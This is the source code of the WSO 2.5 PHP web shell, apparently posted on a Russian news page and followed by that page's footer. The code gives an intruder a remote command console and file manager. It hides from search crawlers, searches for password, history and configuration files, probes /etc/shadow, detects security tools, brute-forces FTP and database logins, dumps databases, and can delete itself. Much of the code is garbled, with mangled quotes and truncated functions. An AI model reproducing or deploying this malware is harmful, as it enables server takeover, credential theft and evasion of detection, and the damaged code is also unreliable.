?php $auth_pass = «63a9f0ea7bb98050796b649e85481845»; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if (!empty ($_SERVER ['HTTP_USER_AGENT'])) {$userAgents = array (, «Slurp», «MSNBot», «ia_archiver», , «Rambler»); if (preg_match ('/'. implode ('|', $userAgents). '/i', $_SERVER ['HTTP_USER_AGENT'])) {header ('HTTP/1.0 404 Not Found'); exit;}} @ini_set ('error_log', NULL); @ini_set ('log_errors',0); @ini_set ('max_execution_time',0); @set_time_limit (0); @set_magic_quotes_runtime (0); @define ('WSO_VERSION', '2.5'); if (get_magic_quotes_gpc ()) {function WSOstripslashes ($array) {return is_array ($array)? array_map ('WSOstripslashes', $array): stripslashes ($array);} $_POST = WSOstripslashes ($_POST); $_COOKIE = WSOstripslashes ($_COOKIE);} function wsoLogin () {die (" Password: ");} function WSOsetcookie ($k, $v) {$_COOKIE [$k] = $v; setcookie ($k, $v);} if (!empty ($auth_pass)) {if (isset ($_POST ['pass']) (md5 ($_POST ['pass']) == $auth_pass)) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']), $auth_pass); if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]) || ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]!= $auth_pass)) wsoLogin ();} if (strtolower (substr (PHP_OS,0,3)) == «win») $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get ('safe_mode'); if (!$safe_mode) error_reporting (0); $disable_functions = @ini_get ('disable_functions'); $home_cwd = @getcwd (); if (isset ($_POST ['c'])) @chdir ($_POST ['c']); $cwd = @getcwd (); if ($os == 'win') {$home_cwd = str_replace ("\", "/", $home_cwd); $cwd = str_replace ("\", "/", $cwd);} if ($cwd [strlen ($cwd)-1]!= '/') $cwd. = '/'; if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax'])) $_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax'] = (bool)$default_use_ajax; if ($os == 'win') $aliases = array ("List Directory" => «dir», "Find index.php in current dir" => «dir /s /w /b index.php», "Find config.php in current dir" => «dir /s /w /b config.php», "Show active connections" => «netstat -an», "Show running services" => «net start», "User accounts" => «net user», "Show computers" => «net view», "ARP Table" => «arp -a», "IP Configuration" => «ipconfig /all»); else $aliases = array ("List dir" => «ls -lha», "list file attributes on a Linux second extended file system" => «lsattr -va», "show opened ports" => «netstat -an | grep -i listen», "process status" => «ps aux», "Find" => "", "find all suid files" => «find / -type f -perm -04000 -ls», "find suid files in current dir" => «find. -type f -perm -04000 -ls», "find all sgid files" => «find / -type f -perm -02000 -ls», "find sgid files in current dir" => «find. -type f -perm -02000 -ls», "find config.inc.php files" => «find / -type f -name config.inc.php», "find config* files" => «find / -type f -name \»config\"", "find config files in current dir" => «find. -type f -name \»config\"", "find all writable folders and files" => «find / -perm -2 -ls», "find all writable folders and files in current dir" => «find. -perm -2 -ls», "find all service.pwd files" => «find / -type f -name service.pwd», "find service.pwd files in current dir" => «find. -type f -name service.pwd», "find all.htpasswd files" => «find / -type f -name.htpasswd», "find.htpasswd files in current dir" => «find. -type f -name.htpasswd», "find all.bash_history files" => «find / -type f -name.bash_history», "find.bash_history files in current dir" => «find. -type f -name.bash_history», "find all.fetchmailrc files" => «find / -type f -name.fetchmailrc», "find.fetchmailrc files in current dir" => «find. -type f -name.fetchmailrc», "Locate" => "", "locate httpd.conf files" => «locate httpd.conf», "locate vhosts.conf files" => «locate vhosts.conf», "locate proftpd.conf files" => «locate proftpd.conf», "locate psybnc.conf files" => «locate psybnc.conf», "locate my.conf files" => «locate my.conf», "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => «locate cfg.php», "locate conf.php files" => «locate conf.php», "locate config.dat files" => «locate config.dat», "locate config.php files" => «locate config.php», "locate config.inc files" => «locate config.inc», "locate config.inc.php" => «locate config.inc.php», "locate config.default.php files" => «locate config.default.php», "locate config files " => «locate config», "locate.conf files"=>"locate '.conf'", "locate.pwd files" => «locate '.pwd'», "locate.sql files" => «locate '.sql'», "locate.htpasswd files" => «locate '.htpasswd'», "locate.bash_history files" => «locate '.bash_history'», "locate.mysql_history files" => «locate '.mysql_history'», "locate.fetchmailrc files" => «locate '.fetchmailrc'», "locate backup files" => «locate backup», "locate dump files" => «locate dump», "locate priv files" => «locate priv»); function wsoHeader () {if (empty ($_POST ['charset'])) $_POST ['charset'] = $GLOBALS ['default_charset']; global $color; echo "". $_SERVER ['HTTP_HOST']. " — WSO ". WSO_VERSION. " body {background-color:#444;color:#e1e1e1;} body, td, th {font: 9pt Lucida, Verdana;margin:0;vertical-align:top;color:#e1e1e1;} table.info {color:#fff;background-color:#222;} span, h1, a {color: $color!important;} span {font-weight: bolder;} h1 {border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;} div.content {padding: 5px;margin-left:5px;background-color:#333;} a {text-decoration:none;} a:hover {text-decoration:underline;}.ml1 {border:1px solid #444;padding:5px;margin:0;overflow: auto;}.bigarea {width:100%;height:300px;} input, textarea, select {margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace, 'Courier New';} form {margin:0px;} toolsTbl {text-align:center;}.toolsInp {width: 300px}.main th {text-align:left;background-color:#5e5e5e;}.main tr:hover {background-color:#5e5e5e}. l1 {background-color:#444}. l2 {background-color:#333} pre {font-family:Courier, Monospace;} var c_ = '". htmlspecialchars ($GLOBALS ['cwd']). "'; var a_ = '". htmlspecialchars (@$_POST ['a']). "' var charset_ = '". htmlspecialchars (@$_POST ['charset']). "'; var p1_ = '". ((strpos (@$_POST ['p1'], "\n")!==false)?'':htmlspecialchars ($_POST ['p1'], ENT_QUOTES)). "'; var p2_ = '". ((strpos (@$_POST ['p2'], "\n")!==false)?'':htmlspecialchars ($_POST ['p2'], ENT_QUOTES)). "'; var p3_ = '". ((strpos (@$_POST ['p3'], "\n")!==false)?'':htmlspecialchars ($_POST ['p3'], ENT_QUOTES)). "'; var d = document; function set (a, c, p1, p2, p3, charset) {if (a!=null) d.mf. a.value=a;else d.mf. a.value=a_; if (c!=null) d.mf. c.value=c;else d.mf. c.value=c_; if (p1!=null) d.mf. p1.value=p1;else d.mf. p1.value=p1_; if (p2!=null) d.mf. p2.value=p2;else d.mf. p2.value=p2_; if (p3!=null) d.mf. p3.value=p3;else d.mf. p3.value=p3_; if (charset!=null) d.mf.charset.value=charset;else d.mf.charset.value=charset_;} function g (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset); d.mf.submit ();} function a (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset); var params = 'ajax=true'; for (i=0;i Read file Make dir:$is_writable Make file:$is_writable Execute Upload file:$is_writable ";} if (!function_exists ("posix_getpwuid") (strpos ($GLOBALS ['disable_functions'], 'posix_getpwuid')===false)) {function posix_getpwuid ($p) {return false;}} if (!function_exists ("posix_getgrgid") (strpos ($GLOBALS ['disable_functions'], 'posix_getgrgid')===false)) {function posix_getgrgid ($p) {return false;}} function wsoEx ($in) {$out = ''; if (function_exists ('exec')) {@exec ($in, $out); $out = @join ("\n", $out);} elseif (function_exists ('passthru')) {ob_start (); @passthru ($in); $out = ob_get_clean ();} elseif (function_exists ('system')) {ob_start (); @system ($in); $out = ob_get_clean ();} elseif (function_exists ('shell_exec')) {$out = shell_exec ($in);} elseif (is_resource ($f = @popen ($in, "r"))) {$out = ""; while (!@feof ($f)) $out. = fread ($f,1024); pclose ($f);} return $out;} function wsoViewSize ($s) {if (is_int ($s)) $s = sprintf ("%u", $s); if ($s = 1073741824) return sprintf ('%1.2f', $s / 1073741824). ' GB'; elseif ($s = 1048576) return sprintf ('%1.2f', $s / 1048576). ' MB'; elseif ($s = 1024) return sprintf ('%1.2f', $s / 1024). ' KB'; else return $s. ' B';} function wsoPerms ($p) {if (($p 0xC000) == 0xC000)$i = 's'; elseif (($p 0xA000) == 0xA000)$i = 'l'; elseif (($p 0x8000) == 0x8000)$i = '-'; elseif (($p 0x6000) == 0x6000)$i = 'b'; elseif (($p 0x4000) == 0x4000)$i = 'd'; elseif (($p 0x2000) == 0x2000)$i = 'c'; elseif (($p 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i. = (($p 0x0100)? 'r': '-'); $i. = (($p 0x0080)? 'w': '-'); $i. = (($p 0x0040)? (($p 0x0800)? 's': 'x'): (($p 0x0800)? 'S': '-')); $i. = (($p 0x0020)? 'r': '-'); $i. = (($p 0x0010)? 'w': '-'); $i. = (($p 0x0008)? (($p 0x0400)? 's': 'x'): (($p 0x0400)? 'S': '-')); $i. = (($p 0x0004)? 'r': '-'); $i. = (($p 0x0002)? 'w': '-'); $i. = (($p 0x0001)? (($p 0x0200)? 't': 'x'): (($p 0x0200)? 'T': '-')); return $i;} function wsoPermsColor ($f) {if (!@is_readable ($f)) return ''. wsoPerms (@fileperms ($f)). ''; elseif (!@is_writable ($f)) return ''. wsoPerms (@fileperms ($f)). ''; else return ''. wsoPerms (@fileperms ($f)). '';} function wsoScandir ($dir) {if (function_exists ("scandir")) {return scandir ($dir);} else {$dh = opendir ($dir); while (false!== ($filename = readdir ($dh))) $files [] = $filename; return $files;}} function wsoWhich ($p) {$path = wsoEx ('which '. $p); if (!empty ($path)) return $path; return false;} function actionSecInfo () {wsoHeader (); echo ' Server security information '; function wsoSecParam ($n, $v) {$v = trim ($v); if ($v) {echo ''. $n. ': '; if (strpos ($v, "\n") === false) echo $v. ''; else echo ''. $v. '';}} wsoSecParam ('Server software', @getenv ('SERVER_SOFTWARE')); if (function_exists ('apache_get_modules')) wsoSecParam ('Loaded Apache modules', implode (', ', apache_get_modules ())); wsoSecParam ('Disabled PHP Functions', $GLOBALS ['disable_functions']?$GLOBALS ['disable_functions']:'none'); wsoSecParam ('Open base dir', @ini_get ('open_basedir')); wsoSecParam ('Safe mode exec dir', @ini_get ('safe_mode_exec_dir')); wsoSecParam ('Safe mode include dir', @ini_get ('safe_mode_include_dir')); wsoSecParam ('cURL support', function_exists ('curl_version')?'enabled':'no'); $temp=array (); if (function_exists ('mysql_get_client_info')) $temp [] = «MySql (».mysql_get_client_inf if (function_exists ('mssql_connect')) $temp [] = «MSSQL»; if (function_exists ('pg_connect')) $temp [] = «PostgreSQL»; if (function_exists ('oci_connect')) $temp [] = «Oracle»; wsoSecParam ('Supported databases', implode (', ', $temp)); echo ''; if ($GLOBALS ['os'] == 'nix') {wsoSecParam ('Readable /etc/passwd', @is_readable ('/etc/passwd')?"yes [view]":'no'); wsoSecParam ('Readable /etc/shadow', @is_readable ('/etc/shadow')?"yes [view]":'no'); wsoSecParam ('OS version', @file_get_contents ('/proc/version')); wsoSecParam ('Distr name', @file_get_contents ('/etc/issue.net')); if (!$GLOBALS ['safe_mode']) {$userful = array ('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); $danger = array ('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); $downloaders = array ('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); echo ''; $temp=array (); foreach ($userful as $item) if (wsoWhich ($item)) $temp [] = $item; wsoSecParam ('Userful', implode (', ', $temp)); $temp=array (); foreach ($danger as $item) if (wsoWhich ($item)) $temp [] = $item; wsoSecParam ('Danger', implode (', ', $temp)); $temp=array (); foreach ($downloaders as $item) if (wsoWhich ($item)) $temp [] = $item; wsoSecParam ('Downloaders', implode (', ', $temp)); echo ''; wsoSecParam ('HDD space', wsoEx ('df -h')); wsoSecParam ('Hosts', @file_get_contents ('/etc/hosts')); echo 'posix_getpwuid ("Read" /etc/passwd) FromTo'; if (isset ($_POST ['p2'], $_POST ['p3']) && is_numeric ($_POST ['p2']) && is_numeric ($_POST ['p3'])) {$temp = ""; for (;$_POST ['p2'] $GLOBALS ['cwd']. $dirContent [$i], 'modify' => date ('Y-m-d H:i:s', @filemtime ($GLOBALS ['cwd']. $dirContent [$i])), 'perms' => wsoPermsColor ($GLOBALS ['cwd']. $dirContent [$i]), 'size' => @filesize ($GLOBALS ['cwd']. $dirContent [$i]), 'owner' => $ow ['name']?$ow ['name']:@fileowner ($dirContent [$i]), 'group' => $gr ['name']?$gr ['name']:@filegroup ($dirContent [$i])); if (@is_file ($GLOBALS ['cwd']. $dirContent [$i])) $files [] = array_merge ($tmp, array ('type' => 'file')); elseif (@is_link ($GLOBALS ['cwd']. $dirContent [$i])) $dirs [] = array_merge ($tmp, array ('type' => 'link', 'link' => readlink ($tmp ['path']))); elseif (@is_dir ($GLOBALS ['cwd']. $dirContent [$i])) $dirs [] = array_merge ($tmp, array ('type' => 'dir'));} $GLOBALS ['sort'] = $sort; function wsoCmp ($a, $b) {if ($GLOBALS ['sort'] [0]!= 'size') return strcmp (strtolower ($a [$GLOBALS ['sort'] [0]]), strtolower ($b [$GLOBALS ['sort'] [0]]))* ($GLOBALS ['sort'] [1]?1:-1); else return (($a ['size'] ['. htmlspecialchars ($f ['name']). ']'). ''. (($f ['type']=='file')?wsoViewSize ($f ['size']):$f ['type']). ''. $f ['modify']. ''. $f ['owner']. '/'. $f ['group']. ''. $f ['perms']. 'R T'. (($f ['type']=='file')?' E D':''). ''; $l = $l?0:1;} echo " CopyMoveDelete"; if (class_exists ('ZipArchive')) echo «Compress (zip) Uncompress (zip)»; echo «Compress (tar.gz)»; if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f'])) echo «Paste / Compress»; echo " "; if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f']) && (($_COOKIE ['act'] == 'zip') || ($_COOKIE ['act'] == 'tar'))) echo «file name: »; echo " "; wsoFooter ();} function actionStringTools () {if (!function_exists ('hex2bin')) {function hex2bin ($p) {return decbin (hexdec ($p));}} if (!function_exists ('binhex')) {function binhex ($p) {return dechex (bindec ($p));}} if (!function_exists ('hex2ascii')) {function hex2ascii ($p) {$r='';for ($i=0;$i strLen ($p);$i+=2) {$r. =chr (hexdec ($p [$i]. $p [$i+1]));} return $r;}} if (!function_exists ('ascii2hex')) {function ascii2hex ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = sprintf ('%02X', ord ($p [$i]));return strtoupper ($r);}} if (!function_exists ('full_urlencode')) {function full_urlencode ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = '%'.dechex (ord ($p [$i]));return strtoupper ($r);}} $stringTools = array ('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen',); if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true); ob_start (); if (in_array ($_POST ['p1'], $stringTools)) echo $_POST'p1'; $temp = «document.getElementById ('strOutput').style.display='';document.getElementById ('strOutput').innerHTML='».addcslashes (htmlspecialchars (ob_get_clean ()), "\n\r\t\'\0"). "';\n"; echo strlen ($temp), "\n", $temp; exit;} if (empty ($_POST ['ajax'])!empty ($_POST ['p1'])) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0); wsoHeader (); echo ' String conversions '; echo ""; foreach ($stringTools as $k => $v) echo "". $k. ""; echo " send using AJAX". (empty ($_POST ['p1'])?'':htmlspecialchars (@$_POST ['p2'])). ""; if (!empty ($_POST ['p1'])) {if (in_array ($_POST ['p1'], $stringTools)) echo htmlspecialchars ($_POST ['p1'] ($_POST ['p2']));} echo" Search files Text Path Name "; function wsoRecursiveGlob ($path) {if (substr ($path, -1)!= '/') $path. ='/'; $paths = @array_unique (@array_merge (@glob ($path. $_POST ['p3']), @glob ($path. '*', GLOB_ONLYDIR))); if (is_array ($paths)&&@count ($paths)) {foreach ($paths as $item) {if (@is_dir ($item)) {if ($path!=$item) wsoRecursiveGlob ($item);} else {if (empty ($_POST ['p2']) || @strpos (file_get_contents ($item), $_POST ['p2'])!==false) echo "".htmlspecialchars ($item). "";}}}} if (@$_POST ['p3']) wsoRecursiveGlob ($_POST ['c']); echo " Search for hash "; wsoFooter ();} function actionFilesTools () {if (isset ($_POST ['p1'])) $_POST ['p1'] = urldecode ($_POST ['p1']); if (@$_POST ['p2']=='download') {if (@is_file ($_POST ['p1']) @is_readable ($_POST ['p1'])) {ob_start ("ob_gzhandler", 4096); header ("Content-Disposition: attachment; filename=".basename ($_POST ['p1'])); if (function_exists ("mime_content_type")) {$type = @mime_content_type ($_POST ['p1']); header ("Content-Type: ". $type);} else header ("Content-Type: application/octet-stream"); $fp = @fopen ($_POST ['p1'], «r»); if ($fp) {while (!@feof ($fp)) echo @fread ($fp, 1024); fclose ($fp);}} exit;} if (@$_POST ['p2'] == 'mkfile') {if (!file_exists ($_POST ['p1'])) {$fp = @fopen ($_POST ['p1'], 'w'); if ($fp) {$_POST ['p2'] = «edit»; fclose ($fp);}}} wsoHeader (); echo ' File tools '; if (!file_exists (@$_POST ['p1'])) {echo 'File not exists'; wsoFooter (); return;} $uid = @posix_getpwuid (@fileowner ($_POST ['p1'])); if (!$uid) {$uid ['name'] = @fileowner ($_POST ['p1']); $gid ['name'] = @filegroup ($_POST ['p1']);} else $gid = @posix_getgrgid (@filegroup ($_POST ['p1'])); echo 'Name: '.htmlspecialchars (@basename ($_POST ['p1'])). ' Size: '. (is_file ($_POST ['p1'])?wsoViewSize (filesize ($_POST ['p1'])):'-'). ' Permission: '.wsoPermsColor ($_POST ['p1']). ' Owner/Group: '. $uid ['name']. '/'. $gid ['name']. ''; echo 'Change time: '.date ('Y-m-d H:i:s', filectime ($_POST ['p1'])). ' Access time: '.date ('Y-m-d H:i:s', fileatime ($_POST ['p1'])). ' Modify time: '.date ('Y-m-d H:i:s', filemtime ($_POST ['p1'])). ''; if (empty ($_POST ['p2'])) $_POST ['p2'] = 'view'; if (is_file ($_POST ['p1'])) $m = array ('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array ('Chmod', 'Rename', 'Touch'); foreach ($m as $v) echo ''. ((strtolower ($v)==@$_POST ['p2'])?' ['. $v. ']':$v). ' '; echo ''; switch ($_POST ['p2']) {case 'view' echo ''; $fp = @fopen ($_POST ['p1'], 'r'); if ($fp) {while (!@feof ($fp)) echo htmlspecialchars (@fread ($fp, 1024)); @fclose ($fp);} echo ''; break; case 'highlight' if (@is_readable ($_POST ['p1'])) {echo ''; $code = @highlight_file ($_POST ['p1'], true); echo str_replace (array (''; break; case 'hexdump' $c = @file_get_contents ($_POST ['p1']); $n = 0; $h = array ('00000000', '', ''); $len = strlen ($c); for ($i=0; $i'; break; case 'touch' if (!empty ($_POST ['p3'])) {$time = strtotime ($_POST ['p3']); if ($time) {if (!touch ($_POST ['p1'], $time, $time)) echo 'Fail!'; else echo 'Touched!';} else echo 'Bad time format!';} clearstatcache (); echo 'p3_="";'; break;} echo ' '; wsoFooter ();} function actionConsole () {if (!empty ($_POST ['p1'])!empty ($_POST ['p2'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', true); $_POST ['p1']. = ' 2> 1';} elseif (!empty ($_POST ['p1'])) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', 0); if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true); ob_start (); echo d.cf.cmd.value='';\n; $temp = @iconv ($_POST ['charset'], 'UTF-8', addcslashes (\n$. $_POST ['p1']. \n.wsoEx ($_POST ['p1']), \n\r\t\\'\0)); if (preg_match (!. *cd\s+ ([^;]+)$!, $_POST ['p1'], $match)) {if (@chdir ($match [1])) {$GLOBALS ['cwd'] = @getcwd (); echo c_='. $GLOBALS ['cwd']. ';;}} echo d.cf.output.value+='. $temp. ';; echo d.cf.output.scrollTop = d.cf.output.scrollHeight;; $temp = ob_get_clean (); echo strlen ($temp), \n, $temp; exit;} if (empty ($_POST ['ajax'])!empty ($_POST ['p1'])) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0); wsoHeader (); echo script if (window.Event) window.captureEvents (Event.KEYDOWN); var cmds = new Array (''); var cur = 0; function kp (e) {var n = (window.Event)? e.which: e.keyCode; if (n == 38) {cur—; if (cur>=0) document.cf.cmd.value = cmds [cur]; else cur++;} else if (n == 40) {cur++; if (cur cmds.length) document.cf.cmd.value = cmds [cur]; else cur—;}} function add (cmd) {cmds.pop (); cmds.push (cmd); cmds.push (''); cur = cmds.length-1;} "; echo ' Console '; foreach ($GLOBALS ['aliases'] as $n => $v) {if ($v == '') {echo ''; continue;} echo ''. $n. '';} echo ' send using AJAX redirect stderr to stdout (2>&1)'; if (!empty ($_POST ['p1'])) {echo htcialchars ("$ ". $_POST ['p1']. "\n".wsoEx ($_POST ['p1']));} echo '$'; echo ' d.cf.cmd.focus ();'; wsoFooter ();} function actionLogout () {setcookie (md5 ($_SERVER ['HTTP_HOST']), '', time () — 3600); die ('bye!');} function actionSelfRemove () {if ($_POST ['p1'] == 'yes') if (@unlink (preg_replace ('!\ (\d+\)\s. *!', '', __FILE__))) die ('Shell has been removed'); else echo 'unlink error!'; if ($_POST ['p1']!= 'yes') wsoHeader (); echo ' h1 Suicide /h1 div class=content Really want to remove the shell? br a href=# onclick= g (null, null, \'yes\') Yes /a /div '; wsoFooter ();} function actionBruteforce () {wsoHeader (); if (isset ($_POST ['proto'])) {echo ' Results Type: '.htmlspecialchars ($_POST ['proto']). ' Server: '.htmlspecialchars ($_POST ['server']). ''; if ($_POST ['proto'] == 'ftp') {function wsoBruteForce ($ip, $port, $login, $pass) {$fp = @ftp_connect ($ip, $port?$port:21); if (!$fp) return false; $res = @ftp_login ($fp, $login, $pass); @ftp_close ($fp); return $res;}} elseif ($_POST ['proto'] == 'mysql') {function wsoBruteForce ($ip, $port, $login, $pass) {$res = @mysql_connect ($ip. ':'. ($port?$port:3306), $login, $pass); @mysql_close ($res); return $res;}} elseif ($_POST ['proto'] == 'pgsql') {function wsoBruteForce ($ip, $port, $login, $pass) {$str = «host='». $ip. "' port='". $port. "' user='". $login. "' password='". $pass. "' dbname=postgres"; $res = @pg_connect ($str); @pg_close ($res); return $res;}} $success = 0; $attempts = 0; $server = explode (":", $_POST ['server']); if ($_POST ['type'] == 1) {$temp = @file ('/etc/passwd'); if (is_array ($temp)) foreach ($temp as $line) {$line = explode (":", $line); ++$attempts; if (wsoBruteForce (@$server [0], @$server [1], $line [0], $line [0])) {$success++; echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($line [0]). '';} if (@$_POST ['reverse']) {$tmp = ""; for ($i=strlen ($line [0])-1; $i>=0; —$i) $tmp. = $line [0] [$i]; ++$attempts; if (wsoBruteForce (@$server [0], @$server [1], $line [0], $tmp)) {$success++; echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($tmp);}}}} elseif ($_POST ['type'] == 2) {$temp = @file ($_POST ['dict']); if (is_array ($temp)) foreach ($temp as $line) {$line = trim ($line); ++$attempts; if (wsoBruteForce ($server [0], @$server [1], $_POST ['login'], $line)) {$success++; echo ''.htmlspecialchars ($_POST ['login']). ':'.htmlspecialchars ($line). '';}}} echo «Attempts: $attempts Success: $success »;} echo ' Bruteforce Type'. 'FTPMySqlPostgreSql'. ''. ''. ''. 'Server:port'. ''. 'Brute type'. ' /etc/passwd'. ' reverse (login -> nigol)'. ' Dictionary'. 'Login'. ''. 'Dictionary'. ''. ''; echo ' '; wsoFooter ();} function actionSql () {class DbClass {var $type; var $link; var $res; function DbClass ($type) {$this->type = $type;} function connect ($host, $user, $pass, $dbname) {switch ($this->type) {case 'mysql' if ($this->link = @mysql_connect ($host, $user, $pass, true)) return true; break; case 'pgsql' $host = explode (':', $host); if (!$host [1]) $host [1]=5432; if ($this->link = @pg_connect ("host= {$host [0]} port= {$host [1]} user=$user password=$pass dbname=$dbname")) return true; break;} return false;} function selectdb ($db) {switch ($this->type) {case 'mysql' if (@mysql_select_db ($db)) return true; break;} return false;} function query ($str) {switch ($this->type) {case 'mysql' return $this->res = @mysql_query ($str); break; case 'pgsql' return $this->res = @pg_query ($this->link, $str); break;} return false;} function fetch () {$res = func_num_args ()?func_get_arg (0):$this->res; switch ($this->type) {case 'mysql' return @mysql_fetch_assoc ($res); break; case 'pgsql' return @pg_fetch_assoc ($res); break;} return false;} function listDbs () {switch ($this->type) {case 'mysql' return $this->query ("SHOW databases"); break; case 'pgsql' return $this->res = $this->query ("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break;} return false;} function listTables () {switch ($this->type) {case 'mysql' return $this->res = $this->query ('SHOW TABLES'); break; case 'pgsql' return $this->res = $this->query ("select table_name from information_schema.tables where table_schema!= 'information_schema' AND table_schema!= 'pg_catalog'"); break;} return false;} function error () {switch ($this->type) {case 'mysql' return @mysql_error (); break; case 'pgsql' return @pg_last_error (); break;} return false;} function setCharset ($str) {switch ($this->type) {case 'mysql' if (function_exists ('mysql_set_charset')) return @mysql_set_charset ($str, $this->link); else $this->query ('SET CHARSET '. $str); break; case 'pgsql' return @pg_set_client_encoding ($this->link, $str); break;} return false;} function loadFile ($str) {switch ($this->type) {case 'mysql' return $this->fetch ($this->query ("SELECT LOAD_FILE ('".addslashes ($str). "') as file")); break; case 'pgsql' $this->query ("CREATE TABLE wso2 (file text);COPY wso2 FROM '".addslashes ($str). "';select file from wso2;"); $r=array (); while ($i=$this->fetch ()) $r [] = $i ['file']; $this->query ('drop table wso2'); return array ('file'=>implode ("\n", $r)); break;} return false;} function dump ($table, $fp = false) {switch ($this->type) {case 'mysql' $res = $this->query ('SHOW CREATE TABLE '. $table. ''); $create = mysql_fetch_array ($res); $sql = $create [1]. ";\n"; if ($fp) fwrite ($fp, $sql); else echo ($sql); $this->query ('SELECT * FROM '. $table. ''); $i = 0; $head = true; while ($item = $this->fetch ()) {$sql = ''; if ($i % 1000 == 0) {$head = true; $sql = ";\n\n";} $columns = array (); foreach ($item as $k= $v) {if ($v === null) $item [$k] = NULL; elseif (is_int ($v)) $item [$k] = $v; else $item [$k] = '. @mysql_real_escape_string ($v). '; $columns [] = `. $k. `;} if ($head) {$sql. = 'INSERT INTO `'. $table. '` ('.implode (, , $columns).) VALUES \n\t (.implode (, , $item). ')'; $head = false;} else $sql. = \n\t, (.implode (, , $item). ')'; if ($fp) fwrite ($fp, $sql); else echo ($sql); $i++;} if (!$head) if ($fp) fwrite ($fp,;\n\n); else echo (;\n\n); break; case 'pgsql' $this— query ('SELECT * FROM '. $table); while ($item = $this— fetch ()) {$columns = array (); foreach ($item as $k= $v) {$item [$k] = '.addslashes ($v). '; $columns [] = $k;} $sql = 'INSERT INTO '. $table. ' ('.implode (, , $columns). ') VALUES ('.implode (, , $item). ');'. \n; if ($fp) fwrite ($fp, $sql); else echo ($sql);} break;} return false;}}; $db = new DbClass ($_POST ['type']); if ((@$_POST ['p2']=='download') (@$_POST ['p1']!='select')) {$db— connect ($_POST ['sql_host'], $_POST ['sql_login'], $_POST ['sql_pass'], $_POST ['sql_base']); $db— selectdb ($_POST ['sql_base']); switch ($_POST ['charset']) {case Windows-1251: $db— setCharset ('cp1251'); break; case UTF-8: $db— setCharset ('utf8'); break; case KOI8-R: $db— setCharset ('koi8r'); break; case KOI8-U: $db— setCharset ('koi8u'); break; case cp866: $db— setCharset ('cp866'); break;} if (empty ($_POST ['file'])) {ob_start (ob_gzhandler, 4096); header (Content-Disposition: attachment; filename=dump.sql); header (Content-Type: text/plain); foreach ($_POST ['tbl'] as $v) $db— dump ($v); exit;} elseif ($fp = @fopen ($_POST ['file'], 'w')) {foreach ($_POST ['tbl'] as $v) $db— dum
Видео дня. В США скончался тележурналист Ларри Кинг
Комментарии
Читайте также
Новости партнеров
Новости партнеров
Больше видео